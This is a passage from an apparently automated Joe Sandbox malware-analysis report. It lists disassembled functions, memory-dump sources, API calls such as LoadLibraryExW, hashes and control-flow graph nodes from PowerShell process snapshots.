                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastWrite
                                                                                    • String ID: U
                                                                                    • API String ID: 442123175-4171548499
                                                                                    • Opcode ID: 42c920046dc7a2b1a26b748f4d44017816129ea4c39c0289737a4b3c3130d930
                                                                                    • Instruction ID: b9b448360c07ee77252e7c636e95567ceb23c9140e00d848f1e8e684f47e8841
                                                                                    • Opcode Fuzzy Hash: 42c920046dc7a2b1a26b748f4d44017816129ea4c39c0289737a4b3c3130d930
                                                                                    • Instruction Fuzzy Hash: 1B419F32B28A85C2DB20EF25E464BA9A7A0FB887D4F944031EE4D87798DF7CD542D750
                                                                                    Function 00007FF767EF9D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF767EF11AF), ref: 00007FF767EF9DD0
                                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF767EF11AF), ref: 00007FF767EF9E11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                    • String ID: csm
                                                                                    • API String ID: 2573137834-1018135373
                                                                                    • Opcode ID: 63a332ca40023c25e9a5d99e6c2caf2710dfa93a35880377e7f0d51da030b8ab
                                                                                    • Instruction ID: e2d424d955a1bdb482bddbeb124d4cb54d82bcfebb4fdb9554c7563bd20edbd1
                                                                                    • Opcode Fuzzy Hash: 63a332ca40023c25e9a5d99e6c2caf2710dfa93a35880377e7f0d51da030b8ab
                                                                                    • Instruction Fuzzy Hash: 3B115E32608B4182EB619F25F454269B7E4FB88BD4FA94235EECC47B58DF3DC5568700
                                                                                    Function 00007FF767EF1230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argument__std_exception_copystd::_
                                                                                    • String ID: string too long
                                                                                    • API String ID: 2536225881-2556327735
                                                                                    • Opcode ID: 7013e128e2125b895d9d66df5116de0737d9dc45951b57089b93d1b7acbd90a4
                                                                                    • Instruction ID: 69c44dbf1b0017378a324c1bfaba0ed72a30912f008b44d6441406e0434da17f
                                                                                    • Opcode Fuzzy Hash: 7013e128e2125b895d9d66df5116de0737d9dc45951b57089b93d1b7acbd90a4
                                                                                    • Instruction Fuzzy Hash: F6E06D71E04B44D0EB06AF21E8A01F8A360AF68794FC88131EE5C46751EE2CE1EBC320

                                                                                    Executed Functions

                                                                                    Function 00007FFD9B873428 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.4195509046.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: /T^
                                                                                    • API String ID: 0-3578457345
                                                                                    • Opcode ID: 4b9f36cf9457570822a0d2a4c3960dbbbcc40443ef06334a7b9d11580246ac06
                                                                                    • Instruction ID: 82878a41ec36f5ea2b731441adb46a4398b0fc83149619dfda920c2012b95fe4
                                                                                    • Opcode Fuzzy Hash: 4b9f36cf9457570822a0d2a4c3960dbbbcc40443ef06334a7b9d11580246ac06
                                                                                    • Instruction Fuzzy Hash: 46318176A0E7D64FE3678BB998A60A53FB0EE2312470A01FBC4C58B0A3D5191A478752
                                                                                    Function 00007FFD9B8733B5 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.4195509046.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                    • Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
                                                                                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                    • Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.8%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 9472 7ffd9b8ad504 9473 7ffd9b8ad50d LoadLibraryExW 9472->9473 9475 7ffd9b8ad5bd 9473->9475

                                                                                    Executed Functions

                                                                                    Function 00007FFD9B973B9E Relevance: 1.9, Instructions: 1909COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4218389577.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9c76d7caea35ce44a933c2ba1b228fde39e6c172e4e00b39c59ba8de2b20aad
                                                                                    • Instruction ID: e5af5aa57f2b7c742f77eea8a36a91ef3dc13f0480420d6c9ab3e0a8f4a2e381
                                                                                    • Opcode Fuzzy Hash: f9c76d7caea35ce44a933c2ba1b228fde39e6c172e4e00b39c59ba8de2b20aad
                                                                                    • Instruction Fuzzy Hash: A4D22361B2EA8D4FE7A9EB6888A567877D1EF65300F1901FED05DC72E3DE24AD418301
                                                                                    Function 00007FFD9B97418F Relevance: 1.3, Instructions: 1321COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 727 7ffd9b97418f-7ffd9b97419d 728 7ffd9b97419f-7ffd9b9741a8 727->728 729 7ffd9b9741ae-7ffd9b9742ad 727->729 728->729 747 7ffd9b9742b3-7ffd9b9742bd 729->747 748 7ffd9b973ca1-7ffd9b9740d6 729->748 749 7ffd9b9742bf-7ffd9b9742da 747->749 750 7ffd9b9742dc-7ffd9b974343 747->750 767 7ffd9b9740dc-7ffd9b9740e9 748->767 749->750 750->748 766 7ffd9b974349-7ffd9b974353 750->766 768 7ffd9b974372-7ffd9b974385 766->768 769 7ffd9b974355-7ffd9b974370 766->769 770 7ffd9b9740eb-7ffd9b9740fe 767->770 771 7ffd9b974105-7ffd9b974123 767->771 773 7ffd9b9743a4-7ffd9b974434 768->773 774 7ffd9b974387-7ffd9b9743a2 768->774 769->768 770->771 771->748 777 7ffd9b974129-7ffd9b974133 771->777 773->748 799 7ffd9b97443a-7ffd9b97446a 773->799 774->773 780 7ffd9b97415d-7ffd9b974169 777->780 781 7ffd9b974135-7ffd9b974141 777->781 780->748 786 7ffd9b97416f-7ffd9b974179 780->786 781->780 787 7ffd9b973cb2-7ffd9b973cc0 786->787 788 7ffd9b97417f-7ffd9b97418e 786->788 787->729 801 7ffd9b974474-7ffd9b9744b4 call 7ffd9b974e78 799->801 810 7ffd9b9744bb-7ffd9b974512 801->810 815 7ffd9b974527-7ffd9b974553 call 7ffd9b975b6d 810->815 818 7ffd9b974598-7ffd9b9745a4 815->818 819 7ffd9b974555-7ffd9b974590 815->819 821 7ffd9b974522 818->821 822 7ffd9b9745aa-7ffd9b9745b7 818->822 819->818 821->815 824 7ffd9b9745b9-7ffd9b9745d4 822->824 825 7ffd9b9745d6-7ffd9b9745e6 822->825 824->825 825->821 826 7ffd9b9745ec-7ffd9b9745f9 825->826 829 7ffd9b9745fb-7ffd9b974616 826->829 830 7ffd9b974618-7ffd9b974624 826->830 829->830 830->821 832 7ffd9b97462a-7ffd9b974637 830->832 835 7ffd9b974639-7ffd9b974654 832->835 836 7ffd9b974656-7ffd9b9746de 832->836 835->836 836->821 849 7ffd9b9746e4-7ffd9b9746f1 836->849 850 7ffd9b9746f3-7ffd9b97470e 849->850 851 7ffd9b974710-7ffd9b974723 849->851 850->851 852 7ffd9b974742-7ffd9b974795 851->852 853 7ffd9b974725-7ffd9b974740 851->853 852->821 864 7ffd9b97479b-7ffd9b9747a8 852->864 853->852 865 7ffd9b9747aa-7ffd9b9747c5 864->865 866 7ffd9b9747c7-7ffd9b9747d3 864->866 865->866 866->821 868 7ffd9b9747d9-7ffd9b9747e6 866->868 869 7ffd9b9747e8-7ffd9b974803 868->869 870 7ffd9b974805-7ffd9b974835 868->870 869->870 878 7ffd9b9748e1-7ffd9b9748f9 870->878 879 7ffd9b97483b-7ffd9b97488d 870->879 883 7ffd9b9748fe-7ffd9b974909 878->883 879->883 889 7ffd9b97488f-7ffd9b974892 879->889 887 7ffd9b97491f-7ffd9b974926 883->887 888 7ffd9b97490b 883->888 891 7ffd9b974927-7ffd9b9749dc 887->891 890 7ffd9b97490e-7ffd9b974910 888->890 889->890 892 7ffd9b974894 889->892 893 7ffd9b974911-7ffd9b97491c 890->893 891->821 918 7ffd9b9749e2-7ffd9b974a3f 891->918 895 7ffd9b9748db-7ffd9b9748e0 892->895 896 7ffd9b974896-7ffd9b9748a0 892->896 893->887 895->878 896->893 898 7ffd9b9748a2-7ffd9b9748a6 896->898 898->891 900 7ffd9b9748a8-7ffd9b9748be 898->900 907 7ffd9b9748c0-7ffd9b9748d2 900->907 908 7ffd9b9748d5-7ffd9b9748da 900->908 907->908 908->895 921 7ffd9b974a84-7ffd9b974abe 918->921 922 7ffd9b974a41-7ffd9b974a7c 918->922 921->821 931 7ffd9b974ac4-7ffd9b974ad1 921->931 922->921 932 7ffd9b974ad3-7ffd9b974aee 931->932 933 7ffd9b974af0-7ffd9b974b03 931->933 932->933 935 7ffd9b974b22-7ffd9b974b75 933->935 936 7ffd9b974b05-7ffd9b974b20 933->936 935->821 946 7ffd9b974b7b-7ffd9b974b88 935->946 936->935 947 7ffd9b974b8a-7ffd9b974ba5 946->947 948 7ffd9b974ba7-7ffd9b974c0e 946->948 947->948 948->821 957 7ffd9b974c14-7ffd9b974c21 948->957 958 7ffd9b974c23-7ffd9b974c3e 957->958 959 7ffd9b974c40-7ffd9b974c4c 957->959 958->959 959->821 960 7ffd9b974c52-7ffd9b974c5f 959->960 962 7ffd9b974c61-7ffd9b974c7c 960->962 963 7ffd9b974c7e-7ffd9b974c8a 960->963 962->963 963->821 965 7ffd9b974c90-7ffd9b974c9d 963->965 967 7ffd9b974c9f-7ffd9b974cba 965->967 968 7ffd9b974cbc-7ffd9b974db8 965->968 967->968 968->821 992 7ffd9b974dbe-7ffd9b974dfb 968->992 996 7ffd9b973a0e-7ffd9b973a4c 992->996 997 7ffd9b9739ca-7ffd9b973a0d 992->997 1006 7ffd9b973a4e-7ffd9b973a65 996->1006 1007 7ffd9b973a69-7ffd9b973afd 996->1007 997->996 1006->1007 1017 7ffd9b973b42-7ffd9b973b4e 1007->1017 1018 7ffd9b973aff-7ffd9b973b3a 1007->1018 1020 7ffd9b973b54-7ffd9b973b5e 1017->1020 1021 7ffd9b9744b6 1017->1021 1018->1017 1023 7ffd9b973b60-7ffd9b973b6d 1020->1023 1024 7ffd9b973b77-7ffd9b973b98 1020->1024 1021->810 1023->1024 1028 7ffd9b973b6f-7ffd9b973b75 1023->1028 1024->1021 1028->1024
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4218389577.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e901a766833a45341c144fdb25238bc2377fec22dfd5b4fe4b62dfb67a0bd2eb
                                                                                    • Instruction ID: a137f52ad136ab92cdbe7358582271622a10cdad78b103ad0573cf0688ff2c63
                                                                                    • Opcode Fuzzy Hash: e901a766833a45341c144fdb25238bc2377fec22dfd5b4fe4b62dfb67a0bd2eb
                                                                                    • Instruction Fuzzy Hash: 24A20361B1EA8D4FE7A9EB6888A566877D1FF65300F1901FED05DC72E3DE24AD418301
                                                                                    Function 00007FFD9B8AD504 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 395 7ffd9b8ad504-7ffd9b8ad50b 396 7ffd9b8ad516-7ffd9b8ad57f 395->396 397 7ffd9b8ad50d-7ffd9b8ad515 395->397 399 7ffd9b8ad589-7ffd9b8ad5bb LoadLibraryExW 396->399 400 7ffd9b8ad581-7ffd9b8ad586 396->400 397->396 401 7ffd9b8ad5bd 399->401 402 7ffd9b8ad5c3-7ffd9b8ad5ea 399->402 400->399 401->402
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4217492780.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: a474be5d93bed7c81527290b06fe147df192653093eecff179f0602ddfff1dba
                                                                                    • Instruction ID: d904ec866ff8f54620cb0d8235acd5d9bf7b311329a9a1d42b91d3ef5f629563
                                                                                    • Opcode Fuzzy Hash: a474be5d93bed7c81527290b06fe147df192653093eecff179f0602ddfff1dba
                                                                                    • Instruction Fuzzy Hash: E731C13190CA4C8FDB59DF989849AE9BBF0FF59320F14826BD009D3252DB74A816CB91